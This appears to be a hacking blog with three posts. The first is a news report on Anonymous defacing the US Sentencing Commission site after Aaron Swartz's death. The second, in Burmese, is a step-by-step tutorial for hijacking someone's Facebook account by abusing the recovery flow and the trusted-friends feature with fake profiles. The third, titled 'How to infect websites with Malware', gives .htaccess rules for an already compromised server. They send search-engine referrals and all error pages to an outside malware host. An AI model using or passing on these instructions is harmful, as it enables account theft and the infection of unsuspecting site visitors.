Sunday, January 27, 2013

Anonymous hackers target US agency site


Screenshot of USSC website  
A video statement was embedded on the website for the United States Sentencing Commission 
Hackers claiming to be from the activist group Anonymous have hacked a US government website in response to the death of Aaron Swartz.

Activists embedded a video statement on the homepage of the United States Sentencing Commission, an agency of the US government.

The statement referred to the death of Mr Swartz, an internet activist who apparently killed himself in January.

"Two weeks ago today, a line was crossed," the statement said.

"Two weeks ago today, Aaron Swartz was killed. Killed because he faced an impossible choice. Killed because he was forced into playing a game he could not win."

Mr Swartz, who was 26, was facing hacking charges and is believed to have taken his own life.
His federal trial was due to be held next month. If found guilty, he could have faced up to 35 years in prison.

Following his death, Mr Swartz's family released a statement blaming "intimidation" and "prosecutorial overreach" from the criminal justice system.

'Operation last resort' The attack on the website was scheduled to begin at midnight eastern standard time, according to documents that appear to have been posted online by Anonymous activists.
Later on Saturday the website was not functioning.

Aaron Swartz  
Aaron Swartz took his own life two weeks ago
 
The USSC is responsible for issuing sentencing guidelines for US federal courts.
The hackers, who had labelled the attack "Operation Last Resort", said the site was chosen for symbolic reasons.

"The federal sentencing guidelines... enable prosecutors to cheat citizens of their constitutionally-guaranteed right to a fair trial, by a jury of their peers [and] are a clear violation of the 8th amendment protection against cruel and unusual punishments," the video statement said.

The statement also suggested the hackers had sensitive information relating to a number of US judges that may be made public.

There have been numerous attacks by hackers operating under the Anonymous banner in recent months.
On Thursday two British men were jailed after taking part in an attacks on payment services including Paypal, organised by Anonymous.

Government websites of the UK and other countries have also been the subjects of attacks.

Sunday, January 20, 2013

Hacking Facebook Accounts Passwords Tutorial


ပထမဆံုး www.facebook.com ကိုသြားပါ...forgot password ကို ႏွိပ္ပါ...ဒီလိုမ်ိဳးေလးေတြ႔ရမယ္ဗ်ာ...

Image

ကိုယ္ hack ရမယ္႔လူ သားေကာင္ရဲ႔ facebook profile email ကို သိဖို႔ေတာ႔လိုပါတယ္....မသိဘူးေတာ႔ မလုပ္ပါနဲ႔ဗ်ာ...ကိုယ္က သူ႔အေကာင္႔လိုခ်င္တာပဲ...ဒီေလာက္ေလးကေတာ႔ ကိုယ္႔နည္းကိုယ္႔ဟန္နဲ႔ စံုစမ္းသိရွိထားျပီးသားျဖစ္ရမွာပါ...ကိုယ္နဲ႔ friend ျဖစ္ေနရင္ သူ႔ info ထဲ၀င္ၾကည္႔လိုက္ရင္ သိႏိူင္တာပဲဗ်ာ...
Enter your email or phone no. ေနရာမွာ သူ႔ email address ကိုထည္႔ပါ...Search ကို ႏွိပ္ပါ...result ထြက္လာရင္ This is my account ကို ႏွိပ္ပါ....

Image

ဒီေအာက္က ပံုမွျပထားတဲ႔အတိုင္း အဲ page ကို redirect ေရာက္သြားပါလိမ္႔မယ္...No longer have access to these ကိုႏွိပ္ပါ...

Image

ေအာက္မွာျပထားတဲ႔ ပံုအတိုင္း new email , confirm new email ေတာင္းေနပါျပီ...ျဖည္႔ေပးလိုက္ပါ....

Image

ကိုယ္႔ victim account ဟာ security question တပ္ထားရင္ security question ေျဖခိုင္းပါလိမ္႔မယ္...ျဖစ္ႏိူင္တာ ခန္႔မွန္းေျဖၾကည္႔ပါ...ခန္႔မွန္းလို႔မရဘူး ဆိုရင္ေတာ႔ wrong answer ကိုသာ ဘာျဖစ္ျဖစ္ရိုက္ထည္႔ေပးလိုက္ပါ...

ေတာ္ေတာ္မ်ားမ်ား ဒီ step မွာ ရပ္ကုန္ၾကတာမ်ားတယ္ဗ်...Security Question ေမးလိုက္တာနဲ႔ ဘာလုပ္လို႔ ဘာကိုင္ရမွန္းမသိေတာ႔ဘူး....Underground Forum ေတာ္ေတာ္မ်ားမ်ားမွာလည္း ဒီ step ကို မေတြ႔ဖူးဘူးဗ်...လြယ္ပါတယ္...

၃ ခါ ရိုက္ထည္႔စမ္းေပးရပါမယ္...၃ခါ ရိုက္ထည္႔လိုက္တာနဲ႔ Security Question ထပ္မေျဖခိုင္းေတာ႔ဘဲ ဒီေအာက္ကပံု အဆင္႔(Trusted Friend သံုးေယာက္)ေရြးခိုင္းတဲ႔အဆင္႔ကိုေရာက္သြားပါလိမ္႔မယ္...

Image

အဲ...ဒီတစ္ဆင္႔မွာလည္း trusted friend ေနာ္...ရိုးရိုး friend မဟုတ္ဘူး...friend ျဖစ္ရံုပဲ ျဖစ္တာဆိုရင္ သူေရြးခိုင္းတဲ႔အထဲမွာ မပါပါဘူး...comment ေတြ status ေတြ အသြားအျပန္ေလးလည္း ရွိရေသးတယ္ဗ်...အဲဒါေၾကာင္႔မို႔ facebook မွာ ကိုယ္နဲ႔လည္း မသိပဲနဲ႔ ေရာေသာေဖာေသာ လာလုပ္ေနျပီဆိုရင္ သတိသာထားေပေတာ႔....ဒီေကာင္ ဘာေကာင္လဲ လို႔.... :D

အဲဒီမွာ ယံုၾကည္ရမယ္႔ ကိုယ္ ခ်ဳပ္ကိုင္ႏိူင္မယ္႔ အေကာင္႔သံုးခုကို ေရြးထည္႔ေပးလိုက္ရံုပါပဲ...fake facebook profile ေလးေတြလုပ္ထားေပါ႔ဗ်ာ...လိုရင္ သံုးလို႔ရေအာင္..... :D facebook က အဲသူငယ္ခ်င္းသံုးေယာက္ဆီကို code ေလးေတြပို႔ပါလိမ္႔မယ္...အဲ code ေတြကို ဒီဖက္မွာ ျပန္လာျဖည္႔လိုက္ရင္ facebook က ကိုယ္႔ email ဆီကို password reset mail ပို႔ပါလိမ္႔မယ္...ဒီလိုဆို new password ကို ေျပာင္းျပီးေတာ႔ သူ႔ facebook account ထဲကို login ၀င္ႏိူင္ပါျပီ....

Thursday, January 10, 2013

How to infect websites with Malware


Requirements
  • Shelled Server
    Access to .htacess file


Shell link ကိုသြားျပီးေတာ႔ .htaccess file ကိုရွာပါ...edit နဲ႔ဖြင္႔ပါ...

Image

Image

ဒီေအာက္က code ေတြနဲ႔ အစားထိုး replace လုပ္ျပီးျပန္ save လိုက္ပါ...
ဒါပါပဲ...


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://villusoftreit.ru/in.cgi?3 [R=301,L]
RewriteEngine On
ErrorDocument 400 http://villusoftreit.ru/in.cgi?3
ErrorDocument 401 http://villusoftreit.ru/in.cgi?3
ErrorDocument 403 http://villusoftreit.ru/in.cgi?3
ErrorDocument 404 http://villusoftreit.ru/in.cgi?3
ErrorDocument 500 http://villusoftreit.ru/in.cgi?3

}

Related Posts Plugin for WordPress, Blogger...